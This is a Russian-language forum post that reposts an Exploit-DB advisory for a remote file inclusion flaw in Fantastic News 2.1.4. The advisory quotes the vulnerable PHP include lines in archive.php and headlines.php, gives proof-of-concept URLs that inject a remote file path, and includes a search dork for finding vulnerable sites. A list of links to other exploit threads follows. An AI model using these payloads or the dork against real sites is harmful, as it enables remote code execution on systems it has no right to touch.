Exploit Fantastic News 2.1.4 - Multiple Remote File Inclusions

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3027
Проверка EDB
  1. Пройдено
Автор
MR-M07
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4671
Дата публикации
2006-12-27
Код: 
+-------------------------------------------------------------------------------------------
+ Fantastic News <== 2.1.4 (CONFIG[script_path]) Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............:  http://fscripts.com
+ Affected Software .: Fantastic News <== 2.1.4
+ Download ..........: http://fscripts.com/download.php?file=1
+ Dork ..............: Powered by Fantastic News v2.1.4
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: Mr-m07 <xp10[at]hotmail.com> Yee7 Team >- WwW.Yee7.com -<
+-------------------------------------------------------------------------------------------
+ Vulnerable Code:
+ =>>archive.php
+
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ =>>headlines.php
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ Proof Of Concept:
+ http://[target]/[path]/archive.php?CONFIG[script_path]=http://localhost/a.txt?
+ http://[target]/[path]/headlines.php?CONFIG[script_path]=http://localhost/a.txt?
+
+
+
+
+-------------------------------------------------------------------------------------------
+Thanx To:
+ Yee7 Team http://www.yee7.com
+ Alshikh
+ ShockShadow
+ Mr.HaCkEr
+ StarseviL
+ AssassiN
+ Star Reach
+
+
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-27]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Fantastic News 2.1.1 - SQL Injection
Ответы
0
Просмотры
333
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fantastic Scripts Fantastic News 2.1.1 - 'news.php' SQL Injection
Ответы
0
Просмотры
308
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fantastic News 2.1.4 - 'news.php' SQL Injection
Ответы
0
Просмотры
286
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fantastic News 2.1.3 - 'script_path' Remote File Inclusion
Ответы
0
Просмотры
310
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fantastic Guestbook 2.0.1 - 'Guestbook.php' HTML Injection
Ответы
0
Просмотры
379
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit News Portal v4.0 - SQL Injection (Unauthorized)
Ответы
0
Просмотры
331
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Spacemarc News - Cross-Site Request Forgery (Add New Post)
Ответы
0
Просмотры
637
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection
Ответы
0
Просмотры
510
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting
Ответы
0
Просмотры
498
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP News Script 4.0.0 - SQL Injection
Ответы
0
Просмотры
495
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу